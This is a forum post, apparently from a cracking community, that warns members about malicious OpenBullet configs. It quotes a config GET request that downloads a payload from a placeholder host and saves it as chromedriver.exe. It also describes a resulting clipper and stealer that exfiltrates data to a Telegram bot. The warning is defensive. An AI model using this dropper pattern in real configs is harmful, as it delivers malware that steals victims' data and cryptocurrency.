• We just launched and are currently in beta. Join us as we build and grow the community.

Beware of malicious/infected configs

Perzerka

System Performance Tuner
P Rep
0
0
0
Rep
0
P Vouches
0
0
0
Vouches
0
Posts
96
Likes
67
Bits
2 MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1 200 XP
We have noticed an increased volume of malicious OpenBullet configs lately.
Like many other malware-related incidents, the attacker uses compromised accounts to spread and to reply to their threads.
Unlike other malware, a malicious config won't have any detection on VirusTotal because there is no code being executed; it's text.
In other words, VirusTotal isn't aware that your config will be loaded on OpenBullet, and it will be translated to a set of instructions.
The malware attack vector is a malicious GET request, and it looks like this:
Code:
Code:
REQUEST GET "https://site.com/config/API"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
-> FILE "bin/chromedriver.exe"
The GET request leads to the payload "API" being downloaded with no extension, in the folder "bin" and then renamed to "chromedriver.exe".
So far, we have seen this malware change the victim clipboarded Bitcoin address (clipper) and read numerous files containing system information (stealer).
The malware logs the victim IP address and sends the stolen data to a Telegram bot. Persistence is granted through a task on the Windows Task Scheduler.
At any time, the malware may change depending on the attacker needs. Here are a few steps you can take to step up your security:
(1) Enable https://cracked.to/usercp.php?action=2fa. It will prevent your account from being accessed if your logins have been stolen.
(2) Do not access Cracked on a virtual machine, or a remote desktop, where you usually run potentially malicious files.
(3) Read your config with any text editor to check for any malicious requests, like malware (GET requests) or hitloggers (POST requests).
Last but not least, report malicious configs. This leak has been rated as working ]0 times this month. (8 times in total)
 

452,292

323,340

323,349

Top